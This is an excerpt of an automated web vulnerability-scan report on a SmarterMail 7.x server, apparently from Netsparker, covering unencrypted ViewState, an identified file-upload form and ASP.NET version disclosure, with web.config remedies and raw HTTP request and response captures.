<b>Details:</b> To enable the details of this specific error message to be viewable on remote machines, please create a &lt;customErrors&gt; tag within a &quot;web.config&quot; configuration file located in the root directory of the current web application. This &lt;customErrors&gt; tag should then have its &quot;mode&quot; attribute set to &quot;Off&quot;.<br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

&lt;!-- Web.Config Configuration File --&gt;

&lt;configuration&gt;
&lt;system.web&gt;
&lt;customErrors mode=&quot;Off&quot;/&gt;
&lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

</td>
</tr>
</table>

<br>

<b>Notes:</b> The current error page you are seeing can be replaced by a custom error page by modifying the &quot;defaultRedirect&quot; attribute of the application's &lt;customErrors&gt; configuration tag to point to a custom error page URL.<br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

&lt;!-- Web.Config Configuration File --&gt;

&lt;configuration&gt;
&lt;system.web&gt;
&lt;customErrors mode=&quot;RemoteOnly&quot; defaultRedirect=&quot;mycustompage.htm&quot;/&gt;
&lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

</td>
</tr>
</table>

<br>

</body>
</html>
ViewState is not Encrypted

ViewState is not Encrypted

1 TOTAL
LOW
Netsparker identified that the target web application doesn't use encryption on ViewState data.

Impact

An attacker can study the application's state management logic for possible vulnerabilities and if your application stores application-critical information in the ViewState; it will also be revealed.

Remedy

ASP.NET provides encryption for ViewState parameters.

For page based protection, place the following directive at the top of affected page.
<%@Page ViewStateEncryptionMode="Always" %>
You can also set this option for the whole application by using web.config files. Apply the following configuration for your application's web.config file.
<System.Web>
	<pages viewStateEncryptionMode="Always"> 
</System.Web>      

Remedy References

- /Main/frmStoredFiles.aspx

/Main/frmStoredFiles.aspx

http://vulnerable.smartermail.7.x.host:9998/Main/frmStoredFiles.aspx

ViewState Version

.NET Framework 2.x

Request

GET /Main/frmStoredFiles.aspx HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Accept-Encoding: gzip, deflate,gzip, deflate
Host: vulnerable.smartermail.7.x.host:9998
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:54:12 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=z1vggi45q5zueh45bhxlte55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3325
Connection: Close




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
SmarterMail Login - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
if (parent.parent.isRoot != null)
parent.parent.location.href = location.href;
</script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Login/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Login" dir="ltr">
<form method="post" action="login.aspx?RedirectUrl=%2fMain%2ffrmStoredFiles.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTI4NzA5NDYyNg8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWAmYPZBYGAgMPZBYCAgEPFgIeBFRleHRlZAIFD2QWAgILDxAPFgIfAgULUmVtZW1iZXIgbWVkZGRkAgcPZBYGAgEPEGQQFQIUVXNlIEJyb3dzZXIgTGFuZ3VhZ2UHRW5nbGlzaBUCAAJlbhQrAwJnZxYBZmQCAw8PFgIeC05hdmlnYXRlVVJMBWhodHRwOi8vd3d3LnNtYXJ0ZXJ0b29scy5jb20vSGVscC9TbWFydGVyTWFpbC92Ny9EZWZhdWx0LmFzcHg/cD1fVVNSJnY9Ny4yLjM5MjUmbGFuZz1lbi1VUyZwYWdlPUxvZ2luVXNlcmRkAgcPDxYIHghJbWFnZVVybAUGL3MuZ2lmHgVXaWR0aBsAAAAAAAAAAAEAAAAeBkhlaWdodBsAAAAAAAAAAAEAAAAeBF8hU0ICgANkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUWY3RsMDAkTVBIJGNoa0F1dG9Mb2dpbgUXY3RsMDAkQlBIJGJ0bkVudGVyQ2xpY2sEHZ/xDsa2Ruq8vSjNI7VPml35tg==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&amp;t=633802452069218315" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1'], [], [], 90);
//]]>
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<div id="ctl00_UpdatePanel1">

<div class="CenteredLogin">
<div class="ShadowBox">
<div class="LoginBox">
<div class="LoginTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="LoginTitleText">
Login to SmarterMail
</div>
</div>
</div>
</div>
<div class="LoginFrame">
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div id="ctl00_TipTextDiv" class="LoginTipTextContainer">

</div>
<div class="LoginSpacer">
</div>
<div class="LoginContent">

<div class="LoginSetting">
<div class="LoginLabel">
Email Address
(ex. user@example.com)
</div>
<input name="ctl00$MPH$txtUserName" type="text" id="ctl00_MPH_txtUserName" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label></span><br />
</div>

</div>
<div class="LoginButtons">

<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout('__doPostBack(\'ctl00$BPH$LanguageList\',\'\')', 0)" id="ctl00_BPH_LanguageList" tabindex="6">
<option selected="selected" value="">Use Browser Language</option>
<option value="en">English</option>

</select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http%3a%2f%2fwww%2esmartertools%2ecom%2fHelp%2fSmarterMail%2fv7%2fDefault%2easpx%3fp%3d%5fUSR%26v%3d7%2e2%2e3925%26lang%3den%2dUS%26page%3dLoginUser" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fwww\x2esmartertools\x2ecom\x2fHelp\x2fSmarterMail\x2fv7\x2fDefault\x2easpx\x3fp\x3d\x5fUSR\x26v\x3d7\x2e2\x2e3925\x26lang\x3den\x2dUS\x26page\x3dLoginUser','helpwindow',''); return false;" tabindex='5'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='4' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:0px;width:0px;border-width:0px;" />

</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="LoginLinks">
<a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>SmarterMail Free 7.2</a> | <a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>Windows Mail Server</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
</div>
</div>


<script type="text/javascript">
$(document).ready(function() {
$('select').each(function() {
if ($(this).width() > 180) $(this).width(180);
});
}); </script>



</div>



<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtUserName');Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>

File Upload Functionality Identified

File Upload Functionality Identified

1 TOTAL
INFORMATION
CONFIRMED
1
This page allows users to upload files to the web server. Upload forms are generally dangerous unless they are coded with a great deal of care. This issue is reported for information only. If there is any other vulnerability identified regarding this resource Netsparker will report it as a separate issue.
- /Main/frmUploadContacts.aspx

/Main/frmUploadContacts.aspx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/Main/frmUploadContacts.aspx?reload=true

Form Name

ctl00$MPH$Uploader$FilePath

Request

GET /Main/frmUploadContacts.aspx?reload=true HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmContactConflict.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:56:36 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4072
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
Import Contacts - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<link href="/WebResource.axd?d=zpx5ZPr_A4Xj1BaWRse8fIv63FDK5xX5aVnnyKmjTOXxq327WxCAUpCTCFitVZxc0&amp;t=634214510020000000" type="text/css" rel="stylesheet" class="Telerik_stylesheet" /><link href="/WebResource.axd?d=zpx5ZPr_A4Xj1BaWRse8fIv63FDK5xX5aVnnyKmjTOUV1VXB2fKIOk7PKOxsWJq_2BHQi4WQTtHC2oWEJP_MRA2&amp;t=634214510020000000" type="text/css" rel="stylesheet" class="Telerik_stylesheet" /><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmUploadContacts.aspx?reload=true" id="aspnetForm" enctype="multipart/form-data">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzQ3MDEwNDc2DxYGHghfX19UaXRsZQUPSW1wb3J0IENvbnRhY3RzHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPFgIeB2VuY3R5cGUFE211bHRpcGFydC9mb3JtLWRhdGEWCgIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBWhkAgcPZBYCZg9kFgICAQ8WAh8FaBYCAgEPFgIeBFRleHRlZAIIDxYCHwVoZAIJD2QWAgIBD2QWAmYPZBYEZg9kFgRmDw8WBh4IQ3NzQ2xhc3MFDEluZGVudCBGaXhlZB8GBQ5GaWxlIHRvIFVwbG9hZB4EXyFTQgICZGQCAQ8PFgQfBwUIIFNldHRpbmcfCAICZBYEZg8WAh4JbWF4bGVuZ3RoBQc1MjQyODgwZAICDw8WAh8GBRpNYXhpbXVtIGZpbGUgc2l6ZTogNTEyMCBLQmRkAgEPZBYCZg8PFgQfBwUIIFNldHRpbmcfCAICZBYEZg8PFgIeF0VuYWJsZUFqYXhTa2luUmVuZGVyaW5naGRkAgEPDxYCHwpoZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFImN0bDAwJE1QSCRVcGxvYWRlciRQcm9ncmVzc01hbmFnZXIFH2N0bDAwJE1QSCRVcGxvYWRlciRQcm9ncmVzc0FyZWHkBsjmOsnorzGZ0LKI+YzlY1yScg==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWQcUaVolINSsSmd45xIt6vT0&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFkCkwxayuZ9tEJ1iSuiwWsQXKCIfDtY9lDmq0WCVQmnux3M5nF11d3thtQqyzpgZRw2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWSCxBSqDJ0QUK8og6bNTVgjpm60b-paVDkgVgV8s8EnXg2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWR9MeV9ZUBGsbQORxp8pY6I0fjnZzGUp1Vh7LOm8VmDBQ2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWTHsMiNv2PssDy2oWnNIalhcjZ1QwtIXXc3SVK-m6b1iA2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFkCkwxayuZ9tEJ1iSuiwWsQXKCIfDtY9lDmq0WCVQmnu5GYO8UVcK58xZeoKNYCc6w2&amp;t=1a035eeb" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1'], [], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
Import Contacts
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<div id="ctl00_BPH_btnOK" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnOK',''); return false;"><span class="BBInner">Next</span></a></div>

</div>
<div class="ButtonBarRight">

<div id="ctl00_BrPH_btnCancel" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$btnCancel',''); return false;"><span class="BBInner">Cancel</span></a></div>

</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>



<span id="ctl00_UpdatePanel1">

</span>

<div id="Scrollable" class="ContentDiv">

<table class="SettingsContainer SCMarginTop" border="0">
<tr>
<td id="ctl00_MPH_Uploader__Label" class="Indent Fixed">File to Upload</td><td class=" Setting"><input name="ctl00$MPH$Uploader$FilePath" type="file" id="ctl00_MPH_Uploader_FilePath" size="50" maxlength="5242880" /><br />
<span id="ctl00_MPH_Uploader_lblMaxUploadSize">Maximum file size: 5120 KB</span></td>
</tr><tr id="ctl00_MPH_Uploader_ProgressRow">
<td id="ctl00_MPH_Uploader_ProgressCell" class=" Setting"><span id="ctl00_MPH_Uploader_ProgressManager"><!-- 2010.2.817.35 --><input id="ctl00_MPH_Uploader_ProgressManager_ClientState" name="ctl00_MPH_Uploader_ProgressManager_ClientState" type="hidden" /></span><div id="ctl00_MPH_Uploader_ProgressArea" class="RadUploadProgressArea RadUploadProgressArea_Default RadUploadProgressAreaHidden">
<div class="ruShadow">
<div id="ctl00_MPH_Uploader_ProgressArea_Panel">
<ul class="ruProgress"><li class="ruFilePortion"><div id="ctl00_MPH_Uploader_ProgressArea_Panel_PrimaryProgressBarOuterDiv" class="ruBar"><div id="ctl00_MPH_Uploader_ProgressArea_Panel_PrimaryProgressBarInnerDiv"><!-- --></div></div>Uploaded <span id="ctl00_MPH_Uploader_ProgressArea_Panel_PrimaryPercent"></span>% (<span id="ctl00_MPH_Uploader_ProgressArea_Panel_PrimaryValue"></span> ) Total <span id="ctl00_MPH_Uploader_ProgressArea_Panel_PrimaryTotal"></span></li><li class="ruFileCount"><div id="ctl00_MPH_Uploader_ProgressArea_Panel_SecondaryProgressBarOuterDiv" class="ruBar"><div id="ctl00_MPH_Uploader_ProgressArea_Panel_SecondaryProgressBarInnerDiv"><!-- --></div></div>Uploaded files: <span id="ctl00_MPH_Uploader_ProgressArea_Panel_SecondaryPercent"></span>% (<span id="ctl00_MPH_Uploader_ProgressArea_Panel_SecondaryValue"></span>) Total files: <span id="ctl00_MPH_Uploader_ProgressArea_Panel_SecondaryTotal"></span></li><li class="ruCurrentFile">Uploading file: <span id="ctl00_MPH_Uploader_ProgressArea_Panel_CurrentOperation"></span></li><li class="ruTimeSpeed">Elapsed time: <span id="ctl00_MPH_Uploader_ProgressArea_Panel_TimeElapsed"></span>&nbsp;Estimated time: <span id="ctl00_MPH_Uploader_ProgressArea_Panel_TimeEstimated"></span>&nbsp;Speed: <span id="ctl00_MPH_Uploader_ProgressArea_Panel_Speed"></span></li></ul>
</div>
</div><input id="ctl00_MPH_Uploader_ProgressArea_ClientState" name="ctl00_MPH_Uploader_ProgressArea_ClientState" type="hidden" />
</div></td>
</tr>
</table>


</div>


<div id="ctl00_Footer" class="Footer">
<div class="FooterNav">


</div>
<div class="FooterSummary">


</div>
</div>

<script type="text/javascript">
document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
var searchId = 'ctl00_SearchRow';
if (parent.HelpPageID) parent.HelpPageID('main/frmuploadcontacts', '');
$(function() {
if (parent.DoneLoading) parent.DoneLoading();
InitAjaxHandlers();
RegisterResizeEvent();
});
</script>




<script type="text/javascript">
//<![CDATA[
parent.UpdateSection('reload');UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fMain\x2ffrmUploadContacts\x2easpx?reload\x3dtrue'); });
Sys.Application.initialize();
$(function() { SetTopTitle('Import\x20Contacts\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail'); });
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadProgressManager, {"_allowCustomProgress":true,"ajaxCallUrl":"../Telerik.RadUploadProgressHandler.ashx","clientStateFieldID":"ctl00_MPH_Uploader_ProgressManager_ClientState","pageGUID":"410f98e1-8307-4a63-b777-2a27feac107c"}, null, null, $get("ctl00_MPH_Uploader_ProgressManager"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadProgressArea, {"_skin":"Default","clientStateFieldID":"ctl00_MPH_Uploader_ProgressArea_ClientState","progressManagerFound":true}, null, null, $get("ctl00_MPH_Uploader_ProgressArea"));
});
//]]>
</script>
</form>
</body>
</html>

ASP.NET Version Disclosure

ASP.NET Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing ASP.NET version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks. It was leaked from X-AspNet-Version banner of HTTP response or default ASP.NET error page.

Impact

An attacker can use disclosed information to harvest specific security vulnerabilities for the version identified. The attacker can also use this information in conjunction with the other vulnerabilities in the application or web server.

Remedy

Apply the following changes on your web.config file to prevent information leakage by using custom error pages and removing X-AspNet-Version from HTTP responses.
<System.Web>
     < httpRuntime enableVersionHeader="false" /> 
     <customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
          <error statusCode="403" redirect="~/error/Forbidden.aspx" />
          <error statusCode="404" redirect="~/error/PageNotFound.aspx" />
          <error statusCode="500" redirect="~/error/InternalError.aspx" />
     </customErrors>
</System.Web>

Remedy References

- /Main/frmStoredFiles.aspx

/Main/frmStoredFiles.aspx

http://vulnerable.smartermail.7.x.host:9998/Main/frmStoredFiles.aspx

Extracted Version

X-AspNet-Version: 2.0.50727

Request

GET /Main/frmStoredFiles.aspx HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Accept-Encoding: gzip, deflate,gzip, deflate
Host: vulnerable.smartermail.7.x.host:9998
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:54:12 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=z1vggi45q5zueh45bhxlte55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3325
Connection: Close




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
SmarterMail Login - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
if (parent.parent.isRoot != null)
parent.parent.location.href = location.href;
</script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Login/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Login" dir="ltr">
<form method="post" action="login.aspx?RedirectUrl=%2fMain%2ffrmStoredFiles.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTI4NzA5NDYyNg8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWAmYPZBYGAgMPZBYCAgEPFgIeBFRleHRlZAIFD2QWAgILDxAPFgIfAgULUmVtZW1iZXIgbWVkZGRkAgcPZBYGAgEPEGQQFQIUVXNlIEJyb3dzZXIgTGFuZ3VhZ2UHRW5nbGlzaBUCAAJlbhQrAwJnZxYBZmQCAw8PFgIeC05hdmlnYXRlVVJMBWhodHRwOi8vd3d3LnNtYXJ0ZXJ0b29scy5jb20vSGVscC9TbWFydGVyTWFpbC92Ny9EZWZhdWx0LmFzcHg/cD1fVVNSJnY9Ny4yLjM5MjUmbGFuZz1lbi1VUyZwYWdlPUxvZ2luVXNlcmRkAgcPDxYIHghJbWFnZVVybAUGL3MuZ2lmHgVXaWR0aBsAAAAAAAAAAAEAAAAeBkhlaWdodBsAAAAAAAAAAAEAAAAeBF8hU0ICgANkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUWY3RsMDAkTVBIJGNoa0F1dG9Mb2dpbgUXY3RsMDAkQlBIJGJ0bkVudGVyQ2xpY2sEHZ/xDsa2Ruq8vSjNI7VPml35tg==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


